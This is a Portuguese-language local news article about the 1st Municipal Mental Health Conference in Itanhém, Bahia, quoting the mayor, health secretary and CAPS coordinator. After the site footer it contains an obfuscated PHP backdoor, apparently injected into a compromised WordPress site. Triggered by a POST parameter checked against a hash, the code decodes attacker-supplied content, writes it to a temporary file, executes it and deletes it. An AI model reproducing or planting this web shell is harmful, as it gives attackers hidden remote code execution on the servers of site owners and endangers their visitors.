• SEJA BEM-VINDO

Itanhém realiza 1ª Conferência Municipal de Saúde Mental

Publicado em: 30/01/2022 Atualizado:: janeiro 30, 2022

 

Mildson disse que se sente feliz em saber que a primeira Conferência da Saúde Mental foi realizada em sua gestão

 

A 1ª Conferência Municipal de Saúde Mental de Itanhém ocorreu nesta última sexta-feira, 28 de janeiro, nas dependências do Centro de Atenção Psicossocial – CAPS, com o tema “A política de Saúde Mental como Direito: Pela defesa do cuidado em liberdade, rumo a avanços e garantia dos serviços da atenção psicossocial no SUS”. O público foi reduzido para evitar aglomerações e a transmissão dos vírus Corona e H3N2.

 

O início do evento se deu por volta das 8:30 da manhã e contou com a presença do prefeito Mildson Medeiros, da secretária de Saúde, Aline Araújo, da coordenadora do CAPS, Flávia Brito, da representante do Conselho Municipal de Saúde, Luzinete Ferrugine e do representante dos usuários do CAPS, Noel Porto.

 

Mildson agradeceu a todos, falou que se sente feliz em saber que a primeira Conferência da Saúde Mental foi realizada em sua gestão e aproveitou para falar da reforma do prédio do CAPS.

 

“Queremos agradecer a participação de todos, dizer que estamos muito felizes em saber que essa 1ª Conferência está sendo realizada em nossa gestão. É muito importante falar de saúde, principalmente de pessoas especiais, de pessoas que precisam de um pouco mais do nosso cuidado. Nós estamos à disposição para dar o nosso melhor para tirar do papel, e fazer dar certo, as propostas que forem criadas aqui. É importante lembrar que fizemos uma grande reforma neste prédio, porque entendemos que, tanto usuários quanto colaboradores merecem um espaço melhor, um ambiente propício até para elevar a autoestima de quem está se recuperando e de quem trabalha”, disse.

 

A secretaria da saúde, Aline Araújo, parabenizou a equipe pelo trabalho realizado e disse que o assunto tem que ser debatido não apenas em conferências. “Quero agradecer e parabenizar a equipe, e dizer que somos uma família que, na medida do possível, estaremos trabalhando e conquistando cada vez mais. É muito importante estarmos abordando esse tema e, com fé em Deus, para os próximos anos, estaremos trabalhando esse tema em outros momentos, quebrando paradigmas e trazendo uma melhor qualidade de vida e uma eficácia melhor, tanto para os nossos usuários, quanto para aqueles que estão em casa sofrendo, mas com vergonha ou reprimidos de tentar pedir ajuda. Nossos profissionais estão capacitados e disponíveis para abraçar essa causa”.

 

A coordenadora Flávia Brito começou falando da qualidade dos serviços, agradeceu à força e o olhar do prefeito, no apoio dos trabalhos da unidade. Ela realizou uma palestra, referente ao tema da conferência e, em seguida, dividiu os grupos para a elaboração das propostas.

 

Após a elaboração e aprovação das propostas, os participantes elegeram delegados para representarem o município na próxima Conferência Estadual de Saúde Mental.

 

Fonte: Bahiaextremosul


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}